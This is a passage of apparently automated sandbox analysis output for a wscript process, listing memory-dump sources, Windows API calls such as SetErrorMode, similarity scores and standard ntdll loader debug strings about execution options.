                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3899507212-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • SetErrorMode.KERNELBASE(00008003,?,?,00727C83,?), ref: 0072D45B
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001D.00000002.30154231684.0000000000720000.00000040.00020000.sdmp, Offset: 00720000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_29_2_720000_wscript.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorMode
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2340568224-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • SetErrorMode.KERNELBASE(00008003,?,?,00727C83,?), ref: 0072D45B
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001D.00000002.30154231684.0000000000720000.00000040.00020000.sdmp, Offset: 00720000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_29_2_720000_wscript.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorMode
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2340568224-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001D.00000002.30163629230.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                      • Associated: 0000001D.00000002.30165670715.0000000004B09000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001D.00000002.30165732579.0000000004B0D000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_29_2_49e0000_wscript.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Non-executed Functions

                                                                                                                                                      Strings
                                                                                                                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04A84460
                                                                                                                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04A84530
                                                                                                                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 04A84507
                                                                                                                                                      • Execute=1, xrefs: 04A8451E
                                                                                                                                                      • ExecuteOptions, xrefs: 04A844AB
                                                                                                                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 04A84592
                                                                                                                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04A8454D
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001D.00000002.30163629230.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                      • Associated: 0000001D.00000002.30165670715.0000000004B09000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001D.00000002.30165732579.0000000004B0D000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_29_2_49e0000_wscript.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                      • API String ID: 0-484625025
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001D.00000002.30163629230.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                      • Associated: 0000001D.00000002.30165670715.0000000004B09000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001D.00000002.30165732579.0000000004B0D000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_29_2_49e0000_wscript.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: $$@
                                                                                                                                                      • API String ID: 0-1194432280
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%